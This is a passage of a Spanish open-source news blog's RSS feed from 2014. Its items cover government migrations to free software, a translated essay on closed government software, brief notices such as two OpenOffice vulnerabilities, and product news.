<li><em>Appsolute Genius</em>. Un spin-off del programa <em>Absolute Genius</em> en el que los anfitriones entrevistarán a programadores informáticos prominentes, entre ellos los creadores de <em>Sonic the Hedgehog</em> y <em>Pac-Man</em>. El espectáculo también se llevará a cabo una competición en la que se elegirá la idea de un niño para crear un videojuego y llevarán a cabo un seguimiento del desarrollo del título durante un período de doce semanas antes de que sea publicado de forma gratuita para PC y teléfonos móviles.</li>
<li><em>Nina and the Neurons: Go Digital</em>. Van a dedicar cinco episodios de la serie <em>CBeebies</em> donde explorarán la impresión 3D, codificación y los coches sin conductor.</li>
</ul>
<p>No es la primera iniciativa al respecto por parte de la BBC en este ámbito. La anterior iniciativa, llevada a cabo en los años ochenta del pasado siglo XX, tuvo bastante éxito dentro del Reino Unido, y se basaba en un microordenador propio de la BBC, que fue desarrollado por <em>Acorn Computers</em> no exenta de cierta polémica por la elección del fabricante frente a <em>Spectrum</em>.</p>
<p>Para esta nueva iniciativa, y con el objetivo de evitar los problemas de la anterior, la BBC quiere formalizar antes de Navidad acuerdos con entre diez o veinte organizaciones que se involucren en los proyectos que están planeando para el próximo año y ya han cerrado acuerdos con las empresas <em>Microsoft</em>, BT, <em>Google</em> y <em>Samsung</em>, y con grupos educativos como <em>Code Club</em>, <em>CoderDojo</em>, <em>Decoded</em> y <em>Codecademy</em>.</p>
<p>Por nuestra parte esperamos que los próximos acuerdos se cierren con más empresas y organizaciones vinculadas al software de código abierto que permitan a las nuevas generaciones aprender no solo a programar sino a realizarlo de forma libre sin crear dependencias con los sistemas cerrados de estos monstruos tecnológicos que todos ya conocemos.</p>
<p>Fuente:
<a href="http://www.bbc.com/news/technology-28984411">http://www.bbc.com/news/technology-28984411</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>El Foro Económico Mundial se fija en Canonical y Raspberry Pi Foundation</title>
      <link>https://www.igalvan.es/posts/el-foro-economico-mundial-se-fija-en/</link>
      <pubDate>Tue, 02 Sep 2014 21:27:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/el-foro-economico-mundial-se-fija-en/</guid>
      <description><![CDATA[<p>El Foro Económico Mundial ha publicado un artículo con las veinticuatro empresas tecnológicas que están cambiando el futuro y por primera vez aparecen dos relacionadas con el mundo <em>GNU/Linux</em>. En este caso han sido, dentro del grupo <em>Digital Networks &amp; Computing</em>, <em>Canonical</em> en el puesto 1 <em>Raspberry Pi Foundation</em> en el puesto 5.</p>
<p>Sobre <em>Canonical</em> dicen que</p>
<blockquote>
<p>“es la compañia detras del sistema operativo Ubuntu y el proveedor principal de servicios para los despliegues de Ubuntu en los sectores empresariales, de manufactura de equipos y telecomunicaciones. Liberado en 2004, Ubuntu  es una plataforma open source para clientes, servidores y computación en la nube, incluyendo dispositivos móviles y telefonos inteligentes. Los usuarios van desde compañías del Fortune 500 hasta diseñadores de hardware, proveedores de contenido, desarrolladores de software y personas individuales.&quot;</p>
</blockquote>
<p>Sobre <em>Raspberry Pi Foundation</em> comentan que</p>
<blockquote>
<p>“es una organización sin animo de lucro ubicada en el Reino Unido, cuyo producto estrella es un microordenador de bajo coste basado en Linux cuyo uso está orientado a la educación. El uso de tecnología de telefonos moviles para
construir un ordenador de propósito general hace el hardware más asequible
para los mercados mundiales de la educación, los sistemas empotrados y el
desarrollo. La fundación es parte de una amplia coalición de organizaciones
que trabaja para fomentar la enseñanza de la informática alrededor del
mundo.“</p>
</blockquote>
<p>Fuente:
<a href="http://forumblog.org/2014/08/24-technology-companies-changing-your-future/">http://forumblog.org/2014/08/24-technology-companies-changing-your-future/</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>¿Por qué no todo el software del Gobierno es de código abierto?</title>
      <link>https://www.igalvan.es/posts/por-que-no-todo-el-software-del/</link>
      <pubDate>Mon, 01 Sep 2014 21:26:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/por-que-no-todo-el-software-del/</guid>
      <description><![CDATA[<p>Este artículo sobre las dificultades de la adopción del <em>software</em>de código abierto en el Gobierno de los EE.UU. me ha parecido muy claro e inspirador sobre una situación que se repite país a país
en todo el mundo. Por este motivo lo he traducido del inglés a nuestro idioma desde la fuente original
<a href="http://ben.balter.com/2014/08/03/why-isnt-all-government-software-open-source/">http://ben.balter.com/2014/08/03/why-isnt-all-government-software-open-source/</a></p>
<p>Disculpen las incorrecciones que haya podido cometer en la traducción y espero que sea de su agrado.</p>
<p>El gobierno federal es el mayor comprador de código en el mundo. ¿Por qué es este código – financiado por los contribuyentes y parte integral para el trabajo del día a día de nuestra democracia – tan a menudo oculto a la vista del público? Hay dos cuestiones a tratar para responder a esta pregunta: ¿Por qué el gobierno desarrolla tan a menudo en plataformas cerradas, y una vez desarrollado, ¿por qué no es abierto el código al público?</p>
<h2 id="el-uso-de-código-abierto">El uso de código abierto</h2>
<p>Es mucho más fácil contribuir al código
abierto cuando estás construyendo sobre una plataforma abierta. Si bien es posible liberar el código fuente de un <em>script</em> VBA, probablemente tiene más impulso y recibe una recepción más cálida desde una plataforma con una comunidad en línea más vibrante como <em>Ruby</em> o <em>Python</em>. Sin embargo, la mayoría de las veces, en el Gobierno se mira por defecto a “<em>nivel empresarial</em>“, desde el inicio a las plataformas propietarias, que envían al Gobierno en la trayectoria del código cerrado.</p>
<h2 id="la-demanda-de-soluciones-de-empresa">La demanda de soluciones de “empresa”</h2>
<p>Hay una buena cantidad de FUD – miedo, incertidumbre y duda – en las compras CIO del Gobierno acerca de que el código abierto es menos seguro, con errores, o es más costoso, y que vas a tener toda una vida de sufrimiento si no se invierte en una verdadera “<em>solución empresarial</em>“.</p>
<p>Por un lado, si un organismo emite un cheque a un proveedor de <em>software</em>, ya saben lo que van a obtener. El contrato detalla
claramente las funciones, horarios de actualización, y asigna la
responsabilidad en caso de que algo vaya mal. Más importante aún, el vendedor
ofrece un número de teléfono al que desde el organismo puede llamar si
necesitan ayuda. “<em>Publica en los foros de soporte y alguien responderá</em>” puede ser una propuesta que de miedo a un CIO.</p>
<h2 id="hay-menos-trajes-detrás-de-código-abierto">Hay menos trajes detrás de código abierto</h2>
<p>Antes de que la transacción se produzca, la plataforma de código cerrado es probable que tenga una página de publicidad llamativa y a un grupo de vendedores federales llamando al organismo y mostrando en las conferencias las cosas que las plataformas de código abierto tradicionalmente no hacen, evitar a <em>Red Hat</em> y algunas otras cosas. Y cuando la oficina del CIO pide características <em>esariales</em>” como registros de auditoría o el cumplimiento de ciertos requisitos de cumplimiento, se puede apostar a que la solución de código cerrado se asegurará de esas características estén en el siguiente ciclo de lanzamiento.</p>
<h2 id="contratistas-de-código-cerrado">Contratistas de código cerrado</h2>
<p>Por último, estas plataformas de código cerrado son sobre lo que los contratistas del Gobierno saben, porque es lo que se enseña en los programas de ciencias de la computación, y lo que siempre han pedido para el suministro. Si una empresa de desarrollo experimentado tiene un montón de desarrolladores de <em>ColdFusion</em>, cuando licitan en un contrato, van a recomendar
que el producto se ​​construya en&lt;<em>ColdFusion</em>. Por no hablar que el RFPdel Gobierno puede estar enfocado para favorecer la tecnología heredada que ya conocen. Todo esto significa que antes de que la primera línea de código se haya escrito, las probabilidades están en contra de que el proyecto vaya ver nunca el exterior del cortafuegos del organismo.Pero incluso si el organismo está usando una plataforma de código cerrado, no hay razón para que su código personalizado no pueda seguir siendo de código abierto.</p>
<h2 id="contribuir-con-el-código-abierto">Contribuir con el código abierto</h2>
<p>Con la excepción del 18F, el CFPB y algunos otros, el Gobierno no escribe código. De hecho, rara vez disponen del conocimiento humano de cómo hacerlo si quisiera. En cambio, tradicionalmente el organismo desempeña el papel de un director de programa no técnico, proporcionando especificaciones para los requisitos funcionales, y la selección de un contratista que entregue la funcionalidad final. Los puntos de contacto en el organismo que supervisa el contrato rara vez participan con la comunidad de código abierto, y mucho menos son apasionados del código abierto. Como resultado, tradicionalmente el código abierto no es ni siquiera parte de la conversación. ¿Por qué debería serlo?</p>
<h2 id="los-flujos-de-trabajo-de-código-cerrado">Los flujos de trabajo de código cerrado&lt;</h2>
<p>En cuanto a la mecánica real del desarrollo de software, el contrato suele estipular un flujo de trabajo de tipo “<em>tíralo por encima de la valla</em>“, donde el organismo ni siquiera ver el código hasta que ya está en producción, en todo caso, muy lejos del concepto de código abierto. Incluso si se les pregunta, los contratistas puede que no tengan experiencia con flujos de trabajo de código abierto, más modernos, o con la participación en la comunidad de código abierto, creando una mala experiencia para todos los involucrados y desalentando futuros intentos sobre código abierto en todo el Gobierno.</p>
<h2 id="reinventar-la-rueda-como-un-modelo-de-negocio">Reinventar la rueda como un modelo de negocio</h2>
<p>También sospecho que los contratistas federales tienen un desincentivo para abrir el código de su trabajo, teniendo en cuenta que los requisitos técnicos probablemente no varían mucho de un organismo a otro. Una solicitud FOIA es una solicitud FOIA y un comunicado de prensa es un comunicado de prensa, sin importar si tiene el membrete de FAA o de la FDA. Liberar el código de estas soluciones por primera vez podría disminuir la demanda de volver a escribir ese mismo código por segunda vez a costa del contribuyente.</p>
<h2 id="una-cultura-de-no">Una cultura de “no”</h2>
<p>Una vez construido, se necesitan seres humanos para llevar ese código a la velocidad de escape necesaria para superar la inercia protectora del organismo. Los responsables de seguridad probablemente que va a decir que no. Los responsables de asuntos jurídicos probablemente que va a decir que no. Tendrá que conseguir la aprobación de la plataforma de alojamiento para el código. Va a tener que adquirir un contrato de mantenimiento continuo para revisar las solicitudes de aceptación de modificaciones. Va a tener que crear una política de compromiso para el desarrollador sobre cómo los acepta. En un mundo de prioridades en competencia, es probable que los empleados del Gobierno opten por pasar al próximo proyecto de cara al ciudadano, en lugar de gastar potencialmente meses combatiendo contra el sistema inmune al cambio de la burocracia.</p>
<h2 id="choque-de-culturas">Choque de culturas</h2>
<p>Incluso si el organismo se las arregla para liberar el código fuente, la comunidad de código abierto sigue un conjunto de normas muy diferentes a los de la rígida jerarquía del Gobierno. Las agencias gubernamentales no siempre saben la mejor manera de involucrar a la comunidad de código abierto, o cómo integrar un flujo de trabajo de código abierto dentro de su propia cultura “<em>orden y control</em>“. Apoyar a una comunidad de código abierto requiere tiempo, algo de lo que los empleados del Gobierno tradicionalmente suelen estar escasos. Y cuando el organismo no sigue las normas tácitas de la comunidad del código de fuentes abiertas, los peores temores de los <em>negativistas</em> se convierten en una profecía autocomplaciente.</p>
<h2 id="la-transparencia-como-una-debilidad">La transparencia como una debilidad</h2>
<p>El código de fuente abierta expone al organismo a la posibilidad de críticas por parte de millones de ojos críticos altamente técnicos, con poco sentido de la percepción desde la perspectiva del organismo. El equipo no técnico del organismo puede no tener la capacidad de evaluar la artesanía del código interno, y es a menudo preferible barrer las cosas bajo la alfombra, en lugar de potencialmente airear sus trapos sucios a algunos de los <em>trolls</em> más hábiles de <em>Internet</em>. Por no hablar de los beneficios del código abierto que los defensores exponen a menudo no se consiguen, y por lo tanto no pueden servir como un contrapeso si el código construido es tan especifico de manera tal que lo hace inutilizable fuera del Gobierno, dejando de esta manera de atraer a colaboradores externos, o si el proyecto está mal gestionado, con el fin de ahuyentar a estos contribuyentes.</p>
<p>Mientras tanto, el código fuente no liberado plantea un escenario de
responsabilidad absolutamente cero en el clima político actual. ¿Cuál
elegirías?</p>
<h2 id="qué-debe-cambiar">¿Qué debe cambiar?</h2>
<p>Para voltear el modelo por defecto, tres son las cosas que tienen que cambiar:</p>
<ul>
<li>En primer lugar, los empleados públicos tienen que estar capacitados con una mejor comprensión y apreciación de las virtudes del código abierto. Aquellos organismos que tienen código abierto, lo hacen porque disponen de individuos entusiastas que encabezan la propuesta. Los proyectos exitosos están en el ámbito desde el primer día con la intención de ser de código abierto, y sirven para formar de nuevo la demanda del mercado. Iniciativas como 18F y el programa PIF pueden tratar de inspirar y educar a la próxima generación de defensores del código abierto dentro del Gobierno.</li>
<li>En segundo lugar, aun cuando el organismo no llama explícitamente para ello, como expertos en la materia, los contratistas del Gobierno tienen el deber de explorar alternativas de código abierto y de educar al mercado como a prácticas de desarrollo estándar de la industria moderna. Cualquier observador casual puede ver la dirección de la marcha del mercado, y las empresas inteligentes tienen la oportunidad de ponerse en frente de ella. Crear competencias internas en torno a tecnologías más populares del momento y hacer crecer la demanda del Gobierno. Que sea más práctico para que el Gobierno haga lo correcto, en lugar de lo que siempre ha hecho.</li>
<li>Por último, la comunidad de código abierto tiene que intensificar su juego, tanto en términos de lo que ofrece – cambiando la percepción de que el código abierto está escrito por aficionados – y el Gobierno de la recepción del código que recibe. Por el lado de la oferta, hay un modelo de negocio tremendo en ser los trajes detrás de cualquiera de los proyectos de código abierto más populares de Internet* – <em>Automattic</em>, <em>GitHub</em>, y <em>Red Hat</em> siendo algunos ejemplos – en la lucha contra el FUD y la prestación de soporte <em>empresa</em>“. Por el lado de la demanda, la comunidad necesita que sea un lastre no liberar el código <em>¿qué escondes?</em>“), y hacer que el regreso de la inversión del organismo sea claro rompiendo la mentalidad del “<em>nosotros contra ellos</em>“, y apoyando, no criticando, los esfuerzos del Gobierno por aprender de código abierto.</li>
</ul>
<p>¿Por qué no todo el <em>software</em> del Gobierno es de código abierto? Porque tienes una cadena de valor diseñada para producir <em>software</em> de código cerrado, un sistema en equilibrio, con pocos incentivos para reinventarse a si mismo. La tecnología ha hecho que colaborar en abierto sea más fácil en los últimos años, y como resultado, el ecosistema de código abierto se ha disparado. Sin embargo, como toda tecnología, el Gobierno tiene todavía un par de años de retraso en la adopción de la corriente principal.Esperemos que, con su ayuda, esto puede cambiar.</p>
<h3 id="notas-al-pie-del-traductor">Notas al pie del traductor</h3>
<ul>
<li>del inglés <em>Fear, Uncertainty and Doubt</em>, en español miedo, incertidumbre y duda.</li>
<li>En el texto original utiliza la palabra agencia, pero la he traducido como organismo dado que es algo más cercano a nuestra cultura sobre las AA.PP.</li>
<li>Se refiere al equivalente en EE.UU. de la carrera española de Grado de Ingeniería en Informática.</li>
<li>del inglés <em>Request For Proposal</em>, traducido como <em>Solicitud de
Propuesta</em>. Es un tipo de documento de adquisición  que se utiliza para
solicitar propuestas de posibles vendedores de productos o servicios para un
proyecto.</li>
<li>18F es una agencia  de servicio digitales perteneciente a la Administración General de los EE.UU. Este grupo produce productor digitales para las organizaciones gubernamentales mediante el uso de metodologías LEAN, código libre y lenguajes de programación actuales. Su nombre proviene de su localización en Washintong DC entre las calles 18 y F.</li>
<li><em>Consumer Financial Protection Bureau</em>, traducido como <em>Oficina de Protección Financiera del Consumidor de los Estados Unidos</em>. Es una agencia federal gubernamental responsable de la regulación de protección al consumidor en los EE.UU.</li>
<li>del ingles <em>Freedom of Information Act</em>, traducido como <em>Ley por la Libertad de la Información</em>. Es una ley que otorga a todos los ciudadanos de los EE.UU. el derecho de acceso a la información federal del Gobierno.</li>
<li>Federal Aviation Administration* traducido como <em>Administración Federal de
Aviación</em>. Es la entidad gubernamental responsable de la regulación de todos los aspectos de la aviación civil en los EE.UU.</li>
<li>Food and Drug Administration*, traducido como <em>Agencia de Alimentos y
Medicamentos</em>. Es la agencia del Gobierno de los EE.UU. responsable de la
regulación de alimentos (tanto para personas como para animales), medicamentos
(humanos y veterinarios), cosméticos, aparatos médicos (humanos y animales),
productos biológicos y derivados sanguíneos.</li>
<li>Negativistas del código abierto. Personas que se encuentran en contra del uso de soluciones de código abierto.</li>
<li><em>Presidential Innovation Fellows</em>. Se trata de un programa de becas competitivas en la que se que los une a los principales innovadores del sector privado, organizaciones sin animo de lucro y gente del mundo académico con los principales innovadores en el Gobierno de EE.UU. para colaborar en soluciones que tienen como objetivo ofrecer resultados significativos en seis meses.</li>
</ul>
<p>Traducido de la fuente original:
<a href="http://ben.balter.com/2014/08/03/why-isnt-all-government-software-open-source/">http://ben.balter.com/2014/08/03/why-isnt-all-government-software-open-source/</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Inmigración de Australia usa Open Source</title>
      <link>https://www.igalvan.es/posts/inmigracion-de-australia-usa-open-source/</link>
      <pubDate>Fri, 29 Aug 2014 23:00:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/inmigracion-de-australia-usa-open-source/</guid>
      <description><![CDATA[<p>Hoy seguimos con buenas noticias del uso de <em>Open Source</em> por parte de las Administraciones Públicas,
en este caso la Agencia de Inmigración de Australia.</p>
<p>No explican qué solución están utilizando, pero según las palabras de Klaus Felsche, Director de Valoración
del Riesgo y Analíticas de esta agencia se usa “la mayoría de los análisis de alto nivel”.</p>
<p>Entre las razones realmente interesantes que ha dado destacan las siguientes:</p>
<ul>
<li>“De alguna manera, es efectivamente más capaz que los productos comerciales…”</li>
<li>“En términos de costo-efectividad, gana sin despeinarse:. Ninguna licencia / cuotas de mantenimiento,
la arquitectura extensible fuente abierto global de investigación y desarrollo(R&amp;D)…”</li>
<li>“Existen costes reales: Tenemos que mantener un equipo de especialistas en el personal para construir,
mantener, pero en el gran esquema de las cosas, otro software requerirían un apoyo similar en la casa…”</li>
<li>“Está demostrando ser robusto, rápido y preciso, y en las manos de un experto, produce resultados que
son aptos para el uso previsto. Y no se puede superar ese precio…”</li>
<li>“Proveedores de software comerciales también están reconociendo las capacidades y costo-efectividad de R,
y han trabajado muy duro para traer R en su suite de soluciones…”</li>
</ul>
<p>Fuente:
<a href="http://www.futuregov.asia/articles/2014/aug/29/why-we-use-open-source-australias-immigration-agen/">http://www.futuregov.asia/articles/2014/aug/29/why-we-use-open-source-australias-immigration-agen/</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Islandia avanza con su plan piloto de software libre</title>
      <link>https://www.igalvan.es/posts/islandia-avanza-con-su-plan-piloto-de/</link>
      <pubDate>Fri, 29 Aug 2014 23:00:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/islandia-avanza-con-su-plan-piloto-de/</guid>
      <description><![CDATA[<p>Buenas noticias desde el norte de Europa, Islandia está haciendo un esfuerzo bastante importante
para llevar a buen fin un plan piloto para migrar sus entidades a <em>software</em> libre.</p>
<p>Este cambio viene auspiciado por la crisis que sufrió el país en el año 2008, y aunque el coste
es un factor importante, destaca que la principal motivación sea el romper las ataduras con
proveedores mejorando sus posibilidades de elección en el futuro.</p>
<p>Tryggvi Bjorgvinsson, el líder de este proyecto gubernamental, ha hecho algunas declaraciones
jugosas al respecto que resumimos a continuación.</p>
<p>De momento dentro de este plan ya se han alcanzado algunos hitos como migrar cinco de sus treinta
y dos escuelas secundarias de <em>Windows</em> a <em>Ubuntu</em> e incluso están usando paquetes ofimáticos libres
y/o <em>Moodle</em>. Otro hito importante es la migración de la PBX del Servicio de Conservación del Suelo a <em>Asterisk</em>.</p>
<p>De los comentarios que hace Bjorgvinsson me parece curioso que diga que el mayor problema que se han
encontrado es el propio uso de los estándares abiertos que no son capaces de manipular las instituciones
que usan software propietario.</p>
<p>Lo que ya no me hizo tanta gracia, porque es algo que he vivido de cerca, es el “<em>amable secuestro”</em> (ironía)
al que tienen sometidas las empresas de <em>software</em> privativo con sus soluciones integrales, que te obligan
a realizar un cambio radical de toda la infraestructura TI cuando quieres abandonarlos.</p>
<p>Por suerte en Islandia no tienen prisa y sí la convicción de hacer un trabajo solido y van avanzando despacito
pero con cabeza, y ya tienen claro que el proceso se demorará durante años.</p>
<p>Fuente:
<a href="http://www.wired.co.uk/news/archive/2012-03/23/iceland-open-source-software">http://www.wired.co.uk/news/archive/2012-03/23/iceland-open-source-software</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>China avanza en la creación de su propio sistema operativo</title>
      <link>https://www.igalvan.es/posts/china-avanza-en-la-creacion-de-su/</link>
      <pubDate>Thu, 28 Aug 2014 21:20:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/china-avanza-en-la-creacion-de-su/</guid>
      <description><![CDATA[<p>Ya hace tiempo que el Gobierno de la República Popular de China expresó sus preocupaciones sobre la
vigilancia que Estados Unidos está realizando sobre los ciudadanos e instituciones tanto de su
propio país como del resto del mundo.</p>
<p>Fruto de estas preocupaciones se estableció en marzo de este año un grupo de trabajo en
la Academia de Ingeniería de China encabezado por Ni Guangnan para crear un sistema
operativo de cosecha propia basado en <em>Linux</em>.</p>
<p>Según esta misma fuente, probablemente durante el próximo mes de octubre estará disponible una versión
de escritorio  que posteriormente, aunque sin fecha definida, se expandirá a los teléfonos
inteligentes y otros dispositivos móviles.</p>
<p>Entre las declaraciones que hizo Ni destacan las siguientes:</p>
<blockquote>
<p>[…]”Existen algunos problemas no relacionados con cuestiones técnicas que pueden complicar el
desarrollo de este proyecto, entre ellos la falta de fondos para la investigación y que muchos
desarrolladores trabajan en diferentes direcciones.”[…]</p>
</blockquote>
<blockquote>
<p>[…]”China cuenta con más de una docena de desarrolladores de sistemas operativos móviles que no tienen
derechos de propiedad intelectual independientes debido a que su investigación se basa en <em>Android</em>“, dijo Ni,
añadiendo el desarrollo futuro debe ser dirigido por el propio Gobierno Chino.[…]</p>
</blockquote>
<blockquote>
<p>[…]”El fin de <em>Windows XP</em> y la prohibición gubernamental sobre la adquisición de <em>Windows 8</em> han
abierto la puerta a los desarrolladores de sistemas operativos domésticos.[…]</p>
</blockquote>
<blockquote>
<p>[…]”Nuestra clave del éxito está en un entorno que puede ayudarnos a competir con <em>Google</em>, <em>Apple</em> y <em>Microsoft</em>“.[…]</p>
</blockquote>
<p>Siempre es bienvenida la iniciativa por parte de un gobierno o institución pública para desarrollar alternativas libres,
pero teniendo en cuenta los antecedentes del Gobierno Chino a este respecto, ¿será realmente <em>software</em> libre? ¿Será
un caballo de Troya para que el propio Gobierno de China haga lo mismo de lo que se queja? Lo veremos en un futuro
próximo.</p>
<p>Fuente: <a href="http://www.bbc.com/news/technology-28928369">http://www.bbc.com/news/technology-28928369</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Detectadas dos vulnerabilidades graves en OpenOffice</title>
      <link>https://www.igalvan.es/posts/detectadas-dos-vulnerabilidades-graves/</link>
      <pubDate>Thu, 28 Aug 2014 21:18:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/detectadas-dos-vulnerabilidades-graves/</guid>
      <description><![CDATA[<p>Toca actualizar nuestra instalación de <em>OpenOffice</em> a la versión 4.1.1 porque se han descubierto dos vulnerabilidades
importantes identificadas con los códigos CVE-2014-3524 y CVE-2014-3575.</p>
<p>La primera permite la inyección de código en la memoria al ejecutar hojas de cálculo especialmente diseñadas
para explotar esta vulnerabilidad y la segunda genera una vista previa de los documentos que, de enviarse a
terceros usuarios, podrían llegar a conseguir el acceso completo a los datos.</p>
<p>Fuentes:
<a href="http://www.openoffice.org/security/cves/CVE-2014-3524.html">http://www.openoffice.org/security/cves/CVE-2014-3524.html</a>
y
<a href="http://www.openoffice.org/security/cves/CVE-2014-3575.html">http://www.openoffice.org/security/cves/CVE-2014-3575.html</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Turín ahorra seis millones de euros pasandose a Open Source</title>
      <link>https://www.igalvan.es/posts/turin-ahorra-seis-millones-de-euros/</link>
      <pubDate>Wed, 27 Aug 2014 21:17:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/turin-ahorra-seis-millones-de-euros/</guid>
      <description><![CDATA[<p>Buenas noticias para el mundo del <em>Open Source</em> porque la ciudad de Turín, que tiene más de 900.000 habitantes,
va a migrar los equipos de escritorio de la administración. En este cambio se verán afectados más de 8.300 equipos
y el proceso se extenderá durante unos seis meses.</p>
<p>Tras realizar un estudio estimaron que el coste total de propiedad de las licencias que hubieran sido necesarias se estimaba
en veintidós millones de euros y con este cambio estiman que se van a ahorrar seis millones de euros. Así que todos estos
equipos migrarán a <em>GNU/Linux</em>,<em>Open Office</em>, <em>Thundebird</em> y <em>Firefox</em>.</p>
<p>Este cambio es importante no solo porque supone que otra administración abandone el software propietario,
sino porque Turín es uno de los centros económicos, políticos y administrativos de Italia, lo que da a
este cambio todavía mayor importancia dada la relevancia de la ciudad.</p>
<p>Fuente:<a href="http://torino.repubblica.it/cronaca/2014/08/03/news/il_comune_rinnova_i_pc_e_d_laddio_a_microsoft_risparmiamo_6_milioni-93067980/">http://torino.repubblica.it/cronaca/2014/08/03/news/il_comune_rinnova_i_pc_e_d_laddio_a_microsoft_risparmiamo_6_milioni-93067980/</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Cloud Suite, Insync reinventandose con Google Drive</title>
      <link>https://www.igalvan.es/posts/cloud-suite-insync-reinventandose-con/</link>
      <pubDate>Wed, 27 Aug 2014 13:00:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/cloud-suite-insync-reinventandose-con/</guid>
      <description><![CDATA[<p>Mientras seguimos con la eterna espera de que <em>Google</em> publique un cliente de <em>Google Drive</em> para <em>Linux</em>, nos vemos “casi obligados” a utilizar
una herramienta privativa como <em>Insync</em>. Y esto no es una opción porque las alternativas están o muertas como el caso de <em>Grive</em> o no tienen comparación posible.</p>
<p>¿A qué viene el párrafo anterior, pues es sencillo de explicar. Me acaba de llegar a mi cuenta un correo publicitario de esta compañía
invitándome a probar su nueva <em>suite</em> <em>Cloud Site</em> para <em>Google Drive</em> que está compuesta por cuatro aplicaciones:</p>
<ul>
<li><em>Drive Box</em>. El cliente de sincronización con <em>Google Drive</em>.</li>
<li><em>PrtSc</em>. Capturas de pantalla compartidas a través de un enlace de <em>Google Drive</em>.</li>
<li><em>Rolls</em>. Permite compartir una colección de fotos o el escritorio mediante un enlace.</li>
<li><em>Warehouse</em>. Permite realizar copias de seguridad directamente a <em>Google Drive</em>.</li>
</ul>
<p>Curiosamente de las cuatro que lo componen tan solo se puede probar <em>PrtSc</em> y aún sigue en modo beta, lo cual no deja de ser paradójico, ¿invitas a probar
un <em>software</em> que todavía no está disponible ni para probarlo? Yo no lo he entendido.</p>
<p>¿Vale la pena pagar por estos servicios? Pues depende, si usas mucho <em>Google Drive</em> como yo, puede que sí, pero sería un detalle poder probarlas antes.</p>
<p>Fuente: <a href="https://insync.io/">https://insync.io/</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Laverna, una alternativa Open Source</title>
      <link>https://www.igalvan.es/posts/laverna-una-alternativa-open-source/</link>
      <pubDate>Tue, 26 Aug 2014 21:11:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/laverna-una-alternativa-open-source/</guid>
      <description><![CDATA[<p>Existen un montón de opciones en <em>Internet</em> a la hora de elegir una aplicación para gestionar tus notas, pero si lo que buscas es algo que se puedas desplegar en tu propia infraestructura que sea de código abierto deberías tener en cuenta la opción que te comentamos ahora.</p>
<p><em>Laverna</em> se anuncia como una alternativa de código abierto a <em>Evernote</em>, pero tengo que reconocer no es tan complejo como este. En cambio, es una aplicación <em>web</em> para notas muy simple que soporta <em>Markdown</em>, creación de tareas y cifrado (si has leído bien, cifrado).</p>
<p>Su mayor baza es que puedes instalar <em>Laverna</em> en tu propio servidor o usarlo como <em>SaaS</em> directamente desde Internet en el enlace que te proporcionamos al final de este artículo.</p>
<p>La idea básica es que <em>Laverna</em> guarda todas las notas dentro de tu navegador o si quieres sincronizarlas en la nube para acceder desde diferentesdispositivos, puedes elegir entre <em>Dropbox</em> o <em>remoteStorage</em>.</p>
<p>La aplicación tiene pocas opciones y son muy fáciles de configurar, pero a cambio el funcionamiento es bastante bueno.</p>
<p>Si te preguntas por qué deberías usar <em>Laverna</em> frente a <em>Evernote</em>, la respuesta es sencilla y doble. Laverna* se puede instalar en tu propia infraestructura, por lo que no tienes que preocuparte por perder tus datos en cualquier momento si tu proveedor se va a la quiebra y deberías preguntarte por qué vas a dejar en manos de otros tus datos, y que conste que no es paranoia.</p>
<p>Fuente:
<a href="https://laverna.cc/">https://laverna.cc/</a>{:target=&quot;_blank&quot;}</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>OpenStreetMap cumple diez años</title>
      <link>https://www.igalvan.es/posts/openstreetmap-cumple-diez-anos/</link>
      <pubDate>Tue, 26 Aug 2014 21:11:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/openstreetmap-cumple-diez-anos/</guid>
      <description><![CDATA[<p>El pasado sábado 16 de agosto el proyecto <em>OpenStreetMap</em> cumplió diez años de vida.
Desde aquí les deseo lo mejor y ya espero poder celebrar con ellos su vigésimo cumpleaños.</p>
<p>Aprovecho la efeméride para dejaros el enlace a un vídeo de<em>YouTube</em>publicado en el canal de <a href="https://www.youtube.com/channel/UC8_dnYYJfcTRFozj9Ob_mrw"><em>Scout by TeleNav</em></a> donde se muestra la evolución de este proyecto durante este tiempo.</p>
<p>Por último otro enlace a una interesante entrevista que le han realizado a <em>Steve Coast</em>, fundador de <em>OpenStreetMap</em>, explicando su proyecto.</p>
<p>Enlace vídeo:
<a href="http://youtu.be/7sC83j6vzjo">http://youtu.be/7sC83j6vzjo</a></p>
<p>Fuente entrevista:
<a href="http://techcrunch.com/2014/08/09/for-the-love-of-open-mapping-data/">http://techcrunch.com/2014/08/09/for-the-love-of-open-mapping-data/</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Spice Fire One Mi, Firefox OS por 28 euros</title>
      <link>https://www.igalvan.es/posts/spice-fire-one-mi-firefox-os-por-28/</link>
      <pubDate>Tue, 26 Aug 2014 21:09:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/spice-fire-one-mi-firefox-os-por-28/</guid>
      <description><![CDATA[<p>El 29 de agosto se pone a la venta en la India este teléfono con <em>Firefox OS</em> por el increíblemente bajo precio de 28 euros.
Está claro que se trata de un terminal de entrada para un país en vías de desarrollo, pero aún así no deja de ser una buena noticia para
<em>Mozilla</em> y para aquellos que queremos que <em>Firefox OS</em> despegue de una vez.</p>
<p>El terminal cuenta con las siguientes características:</p>
<ul>
<li>Un procesador de un núcleo a 1 GHz.</li>
<li>256 MB de RAM</li>
<li>Conectividad solo GSM.</li>
<li>Dual SIM.</li>
